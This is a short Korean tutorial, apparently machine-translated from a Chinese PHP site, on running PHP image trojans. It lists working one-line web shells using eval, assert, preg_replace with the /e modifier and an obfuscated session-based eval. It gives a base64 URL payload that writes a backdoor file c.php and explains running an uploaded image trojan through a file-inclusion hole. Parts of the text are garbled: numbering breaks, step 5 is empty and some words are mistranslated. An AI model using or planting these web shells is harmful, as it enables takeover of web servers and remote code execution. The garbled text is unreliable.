PHP 이미지 Trojan 실행 방법
1. 표준 작성 방법으로 eval
@eval ($_POST['code']);
을 통해 PHP 코드를 직접 실행합니다. ) 종류)
@$_GET['a']($_GET['code']);
3. 사용방법 : url에서 아래의 매개변수를 전달하고 실행 후 현재 디렉터리에 c.php 파일이 생성됩니다
/index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29, base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
매개변수가 eval일 경우 에러 발생 eval이 함수가 아니기 때문에 보고됩니다. 트로이 목마 생성이 실패합니다. 주장하면 동일한 오류가 보고되지만 트로이 목마가 생성됩니다.
4. preg_replace를 사용하여 코드를 실행합니다(앞에 있는 아무 문자열이나 사용하면 됩니다. 다르면 명령이 여러 번 실행될 수 있습니다)
@preg_replace("/re/e", $_POST['code'], "re");
5.
6. 파일 이름 바꾸기session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');
때때로 일부 이미지 트로이 목마가 업로드되지만 실행되지 않는 경우가 있습니다. 포함 취약점이 있으면 이미지 트로이 목마가 발생할 수 있습니다. 처형되다.
php 코드에 include($_GET['controller'])가 있고 url 경로가 /index.php?controller=user라면 이는 해당 컨트롤러를 기반으로 실행하는 코드인 것으로 보입니다. 그러나 URL 경로의 매개변수가 /index.php?uid=/upload/images/muma.jpg로 변경되면 이때 트로이 목마가 실행됩니다.
위 내용은 참고용입니다!
추천 튜토리얼:
PHP 비디오 튜토리얼위 내용은 PHP 이미지 트로이 목마를 실행하는 방법의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!